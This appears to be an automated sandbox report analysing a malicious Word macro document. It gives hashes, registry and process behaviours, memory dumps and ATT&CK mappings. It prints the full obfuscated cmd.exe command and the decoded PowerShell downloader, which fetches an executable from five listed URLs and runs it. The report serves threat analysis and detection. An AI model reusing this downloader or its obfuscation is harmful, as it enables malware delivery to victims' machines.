561a3a5269e77e0789555a8791fe2d0b51f4e43607fc58ad02c60cf3aad8b5e1

General

Target

6ee7ca73b2a8f7ebbdc702a584a6ab4a_JaffaCakes118.doc
Size

132KB
MD5

6ee7ca73b2a8f7ebbdc702a584a6ab4a
SHA1

7823d19d694e0d87f328cab903a1ab9631bfd327
SHA256

561a3a5269e77e0789555a8791fe2d0b51f4e43607fc58ad02c60cf3aad8b5e1
SHA512

3f20695422d87696b7f6c2d04a590c91a7d31e08aca1998df10d9a2c70456a9c9a43fb8d182646a5ee292ed3cb9a5a9db90221414a73d448af470e1ce8904bbe
SSDEEP

3072:A8GhDS0o9zTGOZD6EbzCd3WiWCAWcWvfxa:eoUOZDlbe3WiWCAWcWvfxa

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://levifca.com/y0tYhnWQ

exe.dropper

http://mfpvision.com/yAkPNiSmm6

exe.dropper

http://haganelectronics.rubickdesigns.com/C96xSAAy2q

exe.dropper

http://catairdrones.com/sMQ0n8nNun

exe.dropper

http://radio312.com/mp0NHN4cHX

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	4544	3088	cmd.exe	WINWORD.EXE

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

30 4712 powershell.exe

flow	pid	process
30	4712	powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

3088 WINWORD.EXE
3088 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exe

pid process

4712 powershell.exe
4712 powershell.exe
4712 powershell.exe
2636 powershell.exe
2636 powershell.exe
2636 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 4712 powershell.exe
Token: SeDebugPrivilege 2636 powershell.exe
Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

WINWORD.EXE

pid process

3088 WINWORD.EXE
3088 WINWORD.EXE
3088 WINWORD.EXE
3088 WINWORD.EXE
3088 WINWORD.EXE
3088 WINWORD.EXE
3088 WINWORD.EXE

pid	process
3088	WINWORD.EXE
3088	WINWORD.EXE

pid	process
4712	powershell.exe
4712	powershell.exe
4712	powershell.exe
2636	powershell.exe
2636	powershell.exe
2636	powershell.exe

description	pid	process
Token: SeDebugPrivilege	4712	powershell.exe
Token: SeDebugPrivilege	2636	powershell.exe

pid	process
3088	WINWORD.EXE
3088	WINWORD.EXE
3088	WINWORD.EXE
3088	WINWORD.EXE
3088	WINWORD.EXE
3088	WINWORD.EXE
3088	WINWORD.EXE

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

WINWORD.EXEcmd.exepowershell.exe

description	pid	process	target process
PID 3088 wrote to memory of 4544	3088	WINWORD.EXE	cmd.exe
PID 3088 wrote to memory of 4544	3088	WINWORD.EXE	cmd.exe
PID 4544 wrote to memory of 4712	4544	cmd.exe	powershell.exe
PID 4544 wrote to memory of 4712	4544	cmd.exe	powershell.exe
PID 4712 wrote to memory of 2636	4712	powershell.exe	powershell.exe
PID 4712 wrote to memory of 2636	4712	powershell.exe	powershell.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\6ee7ca73b2a8f7ebbdc702a584a6ab4a_JaffaCakes118.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3088

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /V:O/C"set lj=;'afd'=dww$}}{hctac}};kaerb;'boU'=OFK$;vWd$ metI-ekovnI{ )00008 eg- htgnel.)vWd$ metI-teG(( fI;'fBW'=fSP$;)vWd$ ,abU$(eliFdaolnwoD.dam${yrt{)tdB$ ni abU$(hcaerof;'exe.'+Ihv$+'\'+pmet:vne$=vWd$;'BLv'=zqo$;'391' = Ihv$;'UDL'=DqS$;)'@'(tilpS.'XHc4NHN0pm/moc.213oidar//:ptth@nuNn8n0QMs/moc.senordriatac//:ptth@q2yAASx69C/moc.sngisedkcibur.scinortcelenagah//:ptth@6mmSiNPkAy/moc.noisivpfm//:ptth@QWnhYt0y/moc.acfivel//:ptth'=tdB$;tneilCbeW.teN tcejbo-wen=dam$;'kaF'=zYv$ llehsrewop&&for /L %9 in (475;-1;0)do set Yfw=!Yfw!!lj:~%9,1!&&if %9==0 powershell "!Yfw:*Yfw!=!" "
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4544

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "powershell $vYz='Fak';$mad=new-object Net.WebClient;$Bdt='http://levifca.com/y0tYhnWQ@http://mfpvision.com/yAkPNiSmm6@http://haganelectronics.rubickdesigns.com/C96xSAAy2q@http://catairdrones.com/sMQ0n8nNun@http://radio312.com/mp0NHN4cHX'.Split('@');$SqD='LDU';$vhI = '193';$oqz='vLB';$dWv=$env:temp+'\'+$vhI+'.exe';foreach($Uba in $Bdt){try{$mad.DownloadFile($Uba, $dWv);$PSf='WBf';If ((Get-Item $dWv).length -ge 80000) {Invoke-Item $dWv;$KFO='Uob';break;}}catch{}}$wwd='dfa';"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4712

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" =Fak
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2636

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
ae343a0c544713797d1582baed41cd6c

SHA1
170efb0fbebe36a6f605c6cfd664525f1158a58e

SHA256
dbc33d6f061613aaf9ec0a3472b37ec709ac168cde70c7b48c5807765f3ed292

SHA512
68afed158e066e67d6526627ceda320e1702779b95b8fe597ef573c1be7bcef0dc19f0e6fc17e8103c16fb0aa77d83e06e5f64435100d60193e3ee72e9bbc8b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\TCDAE63.tmp\gb.xsl
Filesize
262KB

MD5
51d32ee5bc7ab811041f799652d26e04

SHA1
412193006aa3ef19e0a57e16acf86b830993024a

SHA256
6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97

SHA512
5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_onw5d0ob.4tw.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/3088-9-0x00007FFF85090000-0x00007FFF85285000-memory.dmp

Filesize
2.0MB

Download
memory/3088-35-0x00007FFF85090000-0x00007FFF85285000-memory.dmp

Filesize
2.0MB

Download
memory/3088-7-0x00007FFF85090000-0x00007FFF85285000-memory.dmp

Filesize
2.0MB

Download
memory/3088-6-0x00007FFF85090000-0x00007FFF85285000-memory.dmp

Filesize
2.0MB

Download
memory/3088-8-0x00007FFF85090000-0x00007FFF85285000-memory.dmp

Filesize
2.0MB

Download
memory/3088-0-0x00007FFF45110000-0x00007FFF45120000-memory.dmp

Filesize
64KB

Download
memory/3088-10-0x00007FFF85090000-0x00007FFF85285000-memory.dmp

Filesize
2.0MB

Download
memory/3088-11-0x00007FFF42B60000-0x00007FFF42B70000-memory.dmp

Filesize
64KB

Download
memory/3088-12-0x00007FFF85090000-0x00007FFF85285000-memory.dmp

Filesize
2.0MB

Download
memory/3088-14-0x00007FFF85090000-0x00007FFF85285000-memory.dmp

Filesize
2.0MB

Download
memory/3088-15-0x00007FFF85090000-0x00007FFF85285000-memory.dmp

Filesize
2.0MB

Download
memory/3088-17-0x00007FFF42B60000-0x00007FFF42B70000-memory.dmp

Filesize
64KB

Download
memory/3088-13-0x00007FFF85090000-0x00007FFF85285000-memory.dmp

Filesize
2.0MB

Download
memory/3088-16-0x00007FFF85090000-0x00007FFF85285000-memory.dmp

Filesize
2.0MB

Download
memory/3088-19-0x00007FFF85090000-0x00007FFF85285000-memory.dmp

Filesize
2.0MB

Download
memory/3088-18-0x00007FFF85090000-0x00007FFF85285000-memory.dmp

Filesize
2.0MB

Download
memory/3088-30-0x00007FFF85090000-0x00007FFF85285000-memory.dmp

Filesize
2.0MB

Download
memory/3088-5-0x00007FFF45110000-0x00007FFF45120000-memory.dmp

Filesize
64KB

Download
memory/3088-39-0x00007FFF85090000-0x00007FFF85285000-memory.dmp

Filesize
2.0MB

Download
memory/3088-571-0x00007FFF85090000-0x00007FFF85285000-memory.dmp

Filesize
2.0MB

Download
memory/3088-3-0x00007FFF45110000-0x00007FFF45120000-memory.dmp

Filesize
64KB

Download
memory/3088-4-0x00007FFF8512D000-0x00007FFF8512E000-memory.dmp

Filesize
4KB

Download
memory/3088-1-0x00007FFF45110000-0x00007FFF45120000-memory.dmp

Filesize
64KB

Download
memory/3088-2-0x00007FFF45110000-0x00007FFF45120000-memory.dmp

Filesize
64KB

Download
memory/3088-522-0x00007FFF85090000-0x00007FFF85285000-memory.dmp

Filesize
2.0MB

Download
memory/3088-547-0x00007FFF85090000-0x00007FFF85285000-memory.dmp

Filesize
2.0MB

Download
memory/3088-548-0x00007FFF85090000-0x00007FFF85285000-memory.dmp

Filesize
2.0MB

Download
memory/3088-549-0x00007FFF85090000-0x00007FFF85285000-memory.dmp

Filesize
2.0MB

Download
memory/3088-567-0x00007FFF45110000-0x00007FFF45120000-memory.dmp

Filesize
64KB

Download
memory/3088-570-0x00007FFF45110000-0x00007FFF45120000-memory.dmp

Filesize
64KB

Download
memory/3088-569-0x00007FFF45110000-0x00007FFF45120000-memory.dmp

Filesize
64KB

Download
memory/3088-568-0x00007FFF45110000-0x00007FFF45120000-memory.dmp

Filesize
64KB

Download
memory/4712-45-0x00000181153B0000-0x00000181153D2000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads